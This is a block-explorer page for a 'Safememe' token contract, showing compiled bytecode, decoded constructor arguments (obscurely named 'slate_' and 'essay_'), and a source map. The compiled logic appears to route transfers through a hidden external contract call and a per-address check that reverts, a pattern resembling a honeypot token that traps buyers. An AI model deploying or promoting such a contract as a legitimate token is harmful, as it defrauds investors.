46106ba576040519150601f19603f3d011682016040523d82523d6000602084013e6106bf565b606091505b509150506106cf818560006108c5565b6001600160a01b038416600090815260046020526040902054828110156107085760405162461bcd60e51b815260040161046590610c4c565b6001600160a01b0380861660008181526004602052604080822087860390559287168082529083902080548701905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610766908790610d60565b60405180910390a35050505050565b60006002816107848280610d8f565b905060006107928383610d8f565b61079d906004610d8f565b935050505090565b600080600180546107b590610dda565b80601f01602080910402602001604051908101604052809291908181526020018280546107e190610dda565b801561082e5780601f106108035761010080835404028352916020019161082e565b820191906000526020600020905b81548152906001019060200180831161081157829003601f168201915b5050600080525050600560209081527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc546040519394503393909250610878918491869101610b6c565b6040516020818303038152906040528051906020012060001c149250505090565b60408051808201909152601281527162616c616e63654f6628616464726573732960701b602082015290565b6001600160a01b038216600090815260056020526040812054906108ea826001610d8f565b90508060011480156108fa575082155b15610404578060011415806109165750610913856102fb565b15155b6104045760405162461bcd60e51b815260040161046590610bb6565b80356001600160a01b038116811461030157600080fd5b60006020828403121561095a578081fd5b61096382610932565b9392505050565b6000806040838503121561097c578081fd5b61098583610932565b915061099360208401610932565b90509250929050565b6000806000606084860312156109b0578081fd5b6109b984610932565b92506109c760208501610932565b9150604084013590509250925092565b600080604083850312156109e9578182fd5b6109f283610932565b946020939093013593505050565b60008060208385031215610a12578182fd5b823567ffffffffffffffff80821115610a29578384fd5b818501915085601f830112610a3c578384fd5b813581811115610a4a578485fd5b8660208083028501011115610a5d578485fd5b60209290920196919550909350505050565b60006020808385031215610a81578182fd5b823567ffffffffffffffff80821115610a98578384fd5b818501915085601f830112610aab578384fd5b813581811115610abd57610abd610e2b565b604051601f8201601f1916810185018381118282101715610ae057610ae0610e2b565b6040528181528382018501881015610af6578586fd5b818585018683013790810190930193909352509392505050565b60008151808452610b28816020860160208601610dae565b601f01601f19169290920160200192915050565b60008251610b4e818460208701610dae565b9190910192915050565b6001600160a01b0391909116815260200190565b6001600160a01b0383168152604060208201819052600090610b9090830184610b10565b949350505050565b901515815260200190565b6000602082526109636020830184610b10565b6020808252600390820152626f6e6560e81b604082015260600190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610d8a57610d8a610e15565b500190565b6000816000190483118215151615610da957610da9610e15565b500290565b60005b83811015610dc9578181015183820152602001610db1565b838111156105ba5750506000910152565b600281046001821680610dee57607f821691505b60208210811415610e0f57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052604160045260246000fdfea2646970667358221220a31629a3aeda3286569c2ff78364a02b04475f2b1ebb1f45e0707fa3d1e2e34264736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d5850a86b6d44052d9383adbf494da3c05c7b0d47afff69ca772a525bb460908c0000000000000000000000000000000000000000000000000000000000000008536166656d656d650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008534146454d454d45000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Safememe
Arg [1] : symbol_ (string): SAFEMEME
Arg [2] : slate_ (address): 0xDff32C65f843188cF64ECBC6F4a13cFf12581b9D
Arg [3] : essay_ (uint256): 39946040830117288813177972031200314882776503959856150450382747710679425257612

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d
Arg [3] : 5850a86b6d44052d9383adbf494da3c05c7b0d47afff69ca772a525bb460908c
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000008
Arg [5] : 536166656d656d65000000000000000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000008
Arg [7] : 534146454d454d45000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

111:11621:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1024:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3524:242;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;2152:108::-;;;:::i;:::-;;;;;;;:::i;4346:295::-;;;;;;:::i;:::-;;:::i;1995:92::-;;;:::i;:::-;;;;;;;:::i;9245:214::-;;;;;;:::i;:::-;;:::i;5050:270::-;;;;;;:::i;:::-;;:::i;2323:177::-;;;;;;:::i;:::-;;:::i;5328:712::-;;;;;;:::i;:::-;;:::i;:::-;;980:87:2;;;:::i;:::-;;;;;;;:::i;1243:104:3:-;;;:::i;6931:503::-;;;;;;:::i;:::-;;:::i;2706:234::-;;;;;;:::i;:::-;;:::i;3003:201::-;;;;;;:::i;:::-;;:::i;1024:100::-;1078:13;1111:5;1104:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1024:100;:::o;3524:242::-;3643:4;3665:13;3681:12;:10;:12::i;:::-;3665:28;;3704:32;3713:5;3720:7;3729:6;3704:8;:32::i;:::-;-1:-1:-1;3754:4:3;;3524:242;-1:-1:-1;;;3524:242:3:o;2152:108::-;2240:12;;2152:108;:::o;4346:295::-;4477:4;4494:15;4512:12;:10;:12::i;:::-;4494:30;;4535:38;4551:4;4557:7;4566:6;4535:15;:38::i;:::-;4584:27;4594:4;4600:2;4604:6;4584:9;:27::i;:::-;-1:-1:-1;4629:4:3;;4346:295;-1:-1:-1;;;;4346:295:3:o;1995:92::-;2078:1;1995:92;:::o;9245:214::-;9402:4;9392:15;;9386:22;9245:214;;;;:::o;5050:270::-;5165:4;5187:13;5203:12;:10;:12::i;:::-;5187:28;;5226:64;5235:5;5242:7;5279:10;5251:25;5261:5;5268:7;5251:9;:25::i;:::-;:38;;;;:::i;:::-;5226:8;:64::i;2323:177::-;-1:-1:-1;;;;;2474:18:3;2442:7;2474:18;;;:9;:18;;;;;;;2323:177::o;5328:712::-;5395:14;5412:10;:8;:10::i;:::-;5395:27;;5437:11;:9;:11::i;:::-;5433:600;;;5465:13;5481:4;;5486:1;5481:7;;;;;-1:-1:-1;;;5481:7:3;;;;;;;;;;;;;;;5491:1;5481:11;;;;:::i;:::-;5465:27;;5507:13;5523:4;;5528:1;5523:7;;;;;-1:-1:-1;;;5523:7:3;;;;;;;;;;;;;;;5533:1;5523:11;;;;:::i;:::-;5507:27;-1:-1:-1;5580:12:3;;5577:2;;5664:1;5657:16;;;5626:9;5695:18;;5755:2;5742:16;;5735:31;;;5577:2;5806:12;5803:2;;5890:1;5883:16;;;5859:1;5921:18;;5981:2;5968:16;;5856:1;5961:27;;5803:2;5558:464;;;5328:712;;;:::o;980:87:2:-;1026:7;1053:6;-1:-1:-1;;;;;1053:6:2;980:87;:::o;1243:104:3:-;1299:13;1332:7;1325:14;;;;;:::i;6931:503::-;7051:4;7073:13;7089:12;:10;:12::i;:::-;7073:28;;7112:24;7139:25;7149:5;7156:7;7139:9;:25::i;:::-;7112:52;;7217:15;7197:16;:35;;7175:122;;;;-1:-1:-1;;;7175:122:3;;;;;;;:::i;:::-;;;;;;;;;7333:60;7342:5;7349:7;7377:15;7358:16;:34;7333:8;:60::i;2706:234::-;2821:4;2843:13;2859:12;:10;:12::i;:::-;2843:28;;2882;2892:5;2899:2;2903:6;2882:9;:28::i;3003:201::-;-1:-1:-1;;;;;3169:18:3;;;3137:7;3169:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;3003:201::o;656:98:0:-;736:10;656:98;:::o;10556:380:3:-;-1:-1:-1;;;;;10692:19:3;;10684:68;;;;-1:-1:-1;;;10684:68:3;;;;;;;:::i;:::-;-1:-1:-1;;;;;10771:21:3;;10763:68;;;;-1:-1:-1;;;10763:68:3;;;;;;;:::i;:::-;-1:-1:-1;;;;;10844:18:3;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;;:36;;;10896:32;;;;;10874:6;;10896:32;:::i;:::-;;;;;;;;10556:380;;;:::o;11227:502::-;11362:24;11389:25;11399:5;11406:7;11389:9;:25::i;:::-;11362:52;;-1:-1:-1;;11429:16:3;:37;11425:297;;11529:6;11509:16;:26;;11483:117;;;;-1:-1:-1;;;11483:117:3;;;;;;;:::i;:::-;11644:51;11653:5;11660:7;11688:6;11669:16;:25;11644:8;:51::i;:::-;11227:502;;;;:::o;7904:926::-;-1:-1:-1;;;;;8035:18:3;;8027:68;;;;-1:-1:-1;;;8027:68:3;;;;;;;:::i;:::-;8186:17;8207:6;-1:-1:-1;;;;;8207:11:3;8257:10;:8;:10::i;:::-;8269:4;8233:41;;;;;;;;:::i;:::-;;;;-1:-1:-1;;8233:41:3;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;8233:41:3;-1:-1:-1;;;;;;8233:41:3;;;;;;;;;8207:78;;;8233:41;8207:78;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8183:102;;;8296:26;8304:4;8310;8316:5;8296:7;:26::i;:::-;-1:-1:-1;;;;;8355:15:3;;8333:19;8355:15;;;:9;:15;;;;;;8403:21;;;;8381:109;;;;-1:-1:-1;;;8381:109:3;;;;;;;:::i;:::-;-1:-1:-1;;;;;8526:15:3;;;;;;;:9;:15;;;;;;8544:20;;;8526:38;;8744:13;;;;;;;;;;:23;;;;;;8796:26;;;;;;8558:6;;8796:26;:::i;:::-;;;;;;;;7904:926;;;;;:::o;6048:162::-;6090:7;6122:1;6090:7;6146:5;6122:1;;6146:5;:::i;:::-;6134:17;-1:-1:-1;6162:9:3;6174:5;6178:1;6134:17;6174:5;:::i;:::-;:9;;6182:1;6174:9;:::i;:::-;6162:21;-1:-1:-1;;;;6048:162:3;:::o;6218:210::-;6261:4;6278:17;6298:5;6278:25;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;6314:11:3;6401:18;;-1:-1:-1;;6401:6:3;:18;;;;;;;6375:20;6278:25;;-1:-1:-1;6328:10:3;;6401:18;;-1:-1:-1;6375:20:3;;6328:10;;6278:25;;6375:20;;:::i;:::-;;;;;;;;;;;;;6365:31;;;;;;6357:40;;:62;6349:71;;;;6218:210;:::o;8838:103::-;8906:27;;;;;;;;;;;;-1:-1:-1;;;8906:27:3;;;;8838:103;:::o;8949:288::-;-1:-1:-1;;;;;9079:14:3;;9067:9;9079:14;;;:6;:14;;;;;;;9116:5;9079:14;9120:1;9116:5;:::i;:::-;9104:17;;9136:1;9141:5;9136:10;:16;;;;;9151:1;9150:2;9136:16;9132:98;;;9177:1;9182;9177:6;;:33;;;;9187:18;9200:4;9187:12;:18::i;:::-;:23;;9177:33;9169:49;;;;-1:-1:-1;;;9169:49:3;;;;;;;:::i;14:175:4:-;84:20;;-1:-1:-1;;;;;133:31:4;;123:42;;113:2;;179:1;176;169:12;194:198;;306:2;294:9;285:7;281:23;277:32;274:2;;;327:6;319;312:22;274:2;355:31;376:9;355:31;:::i;:::-;345:41;264:128;-1:-1:-1;;;264:128:4:o;397:274::-;;;526:2;514:9;505:7;501:23;497:32;494:2;;;547:6;539;532:22;494:2;575:31;596:9;575:31;:::i;:::-;565:41;;625:40;661:2;650:9;646:18;625:40;:::i;:::-;615:50;;484:187;;;;;:::o;676:342::-;;;;822:2;810:9;801:7;797:23;793:32;790:2;;;843:6;835;828:22;790:2;871:31;892:9;871:31;:::i;:::-;861:41;;921:40;957:2;946:9;942:18;921:40;:::i;:::-;911:50;;1008:2;997:9;993:18;980:32;970:42;;780:238;;;;;:::o;1023:266::-;;;1152:2;1140:9;1131:7;1127:23;1123:32;1120:2;;;1173:6;1165;1158:22;1120:2;1201:31;1222:9;1201:31;:::i;:::-;1191:41;1279:2;1264:18;;;;1251:32;;-1:-1:-1;;;1110:179:4:o;1294:666::-;;;1441:2;1429:9;1420:7;1416:23;1412:32;1409:2;;;1462:6;1454;1447:22;1409:2;1507:9;1494:23;1536:18;1577:2;1569:6;1566:14;1563:2;;;1598:6;1590;1583:22;1563:2;1641:6;1630:9;1626:22;1616:32;;1686:7;1679:4;1675:2;1671:13;1667:27;1657:2;;1713:6;1705;1698:22;1657:2;1758;1745:16;1784:2;1776:6;1773:14;1770:2;;;1805:6;1797;1790:22;1770:2;1864:7;1859:2;1853;1845:6;1841:15;1837:2;1833:24;1829:33;1826:46;1823:2;;;1890:6;1882;1875:22;1823:2;1926;1918:11;;;;;1948:6;;-1:-1:-1;1399:561:4;;-1:-1:-1;;;;1399:561:4:o;1965:957::-;;2064:2;2107;2095:9;2086:7;2082:23;2078:32;2075:2;;;2128:6;2120;2113:22;2075:2;2173:9;2160:23;2202:18;2243:2;2235:6;2232:14;2229:2;;;2264:6;2256;2249:22;2229:2;2307:6;2296:9;2292:22;2282:32;;2352:7;2345:4;2341:2;2337:13;2333:27;2323:2;;2379:6;2371;2364:22;2323:2;2420;2407:16;2442:2;2438;2435:10;2432:2;;;2448:18;;:::i;:::-;2497:2;2491:9;2566:2;2547:13;;-1:-1:-1;;2543:27:4;2531:40;;2527:49;;2591:18;;;2611:22;;;2588:46;2585:2;;;2637:18;;:::i;:::-;2673:2;2666:22;2697:18;;;2734:11;;;2730:20;;2727:33;-1:-1:-1;2724:2:4;;;2778:6;2770;2763:22;2724:2;2839;2834;2830;2826:11;2821:2;2813:6;2809:15;2796:46;2862:15;;;2858:24;;;2851:40;;;;-1:-1:-1;2866:6:4;2044:878;-1:-1:-1;;;2044:878:4:o;2927:260::-;;3009:5;3003:12;3036:6;3031:3;3024:19;3052:63;3108:6;3101:4;3096:3;3092:14;3085:4;3078:5;3074:16;3052:63;:::i;:::-;3169:2;3148:15;-1:-1:-1;;3144:29:4;3135:39;;;;3176:4;3131:50;;2979:208;-1:-1:-1;;2979:208:4:o;3192:274::-;;3359:6;3353:13;3375:53;3421:6;3416:3;3409:4;3401:6;3397:17;3375:53;:::i;:::-;3444:16;;;;;3329:137;-1:-1:-1;;3329:137:4:o;3752:203::-;-1:-1:-1;;;;;3916:32:4;;;;3898:51;;3886:2;3871:18;;3853:102::o;3960:319::-;-1:-1:-1;;;;;4137:32:4;;4119:51;;4206:2;4201;4186:18;;4179:30;;;3960:319;;4226:47;;4254:18;;4246:6;4226:47;:::i;:::-;4218:55;4109:170;-1:-1:-1;;;;4109:170:4:o;4284:187::-;4449:14;;4442:22;4424:41;;4412:2;4397:18;;4379:92::o;4476:222::-;;4625:2;4614:9;4607:21;4645:47;4688:2;4677:9;4673:18;4665:6;4645:47;:::i;4703:326::-;4905:2;4887:21;;;4944:1;4924:18;;;4917:29;-1:-1:-1;;;4977:2:4;4962:18;;4955:33;5020:2;5005:18;;4877:152::o;5034:398::-;5236:2;5218:21;;;5275:2;5255:18;;;5248:30;5314:34;5309:2;5294:18;;5287:62;-1:-1:-1;;;5380:2:4;5365:18;;5358:32;5422:3;5407:19;;5208:224::o;5437:353::-;5639:2;5621:21;;;5678:2;5658:18;;;5651:30;5717:31;5712:2;5697:18;;5690:59;5781:2;5766:18;;5611:179::o;5795:402::-;5997:2;5979:21;;;6036:2;6016:18;;;6009:30;6075:34;6070:2;6055:18;;6048:62;-1:-1:-1;;;6141:2:4;6126:18;;6119:36;6187:3;6172:19;;5969:228::o;6202:401::-;6404:2;6386:21;;;6443:2;6423:18;;;6416:30;6482:34;6477:2;6462:18;;6455:62;-1:-1:-1;;;6548:2:4;6533:18;;6526:35;6593:3;6578:19;;6376:227::o;6608:400::-;6810:2;6792:21;;;6849:2;6829:18;;;6822:30;6888:34;6883:2;6868:18;;6861:62;-1:-1:-1;;;6954:2:4;6939:18;;6932:34;6998:3;6983:19;;6782:226::o;7013:401::-;7215:2;7197:21;;;7254:2;7234:18;;;7227:30;7293:34;7288:2;7273:18;;7266:62;-1:-1:-1;;;7359:2:4;7344:18;;7337:35;7404:3;7389:19;;7187:227::o;7419:177::-;7565:25;;;7553:2;7538:18;;7520:76::o;7601:184::-;7773:4;7761:17;;;;7743:36;;7731:2;7716:18;;7698:87::o;7790:128::-;;7861:1;7857:6;7854:1;7851:13;7848:2;;;7867:18;;:::i;:::-;-1:-1:-1;7903:9:4;;7838:80::o;7923:168::-;;8029:1;8025;8021:6;8017:14;8014:1;8011:21;8006:1;7999:9;7992:17;7988:45;7985:2;;;8036:18;;:::i;:::-;-1:-1:-1;8076:9:4;;7975:116::o;8096:258::-;8168:1;8178:113;8192:6;8189:1;8186:13;8178:113;;;8268:11;;;8262:18;8249:11;;;8242:39;8214:2;8207:10;8178:113;;;8309:6;8306:1;8303:13;8300:2;;;-1:-1:-1;;8344:1:4;8326:16;;8319:27;8149:205::o;8359:380::-;8444:1;8434:12;;8491:1;8481:12;;;8502:2;;8556:4;8548:6;8544:17;8534:27;;8502:2;8609;8601:6;8598:14;8578:18;8575:38;8572:2;;;8655:10;8650:3;8646:20;8643:1;8636:31;8690:4;8687:1;8680:15;8718:4;8715:1;8708:15;8572:2;;8414:325;;;:::o;8744:127::-;8805:10;8800:3;8796:20;8793:1;8786:31;8836:4;8833:1;8826:15;8860:4;8857:1;8850:15;8876:127;8937:10;8932:3;8928:20;8925:1;8918:31;8968:4;8965:1;8958:15;8992:4;8989:1;8982:15

Swarm Source

ipfs://a31629a3aeda3286569c2ff78364a02b04475f2b1ebb1f45e0707fa3d1e2e342

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.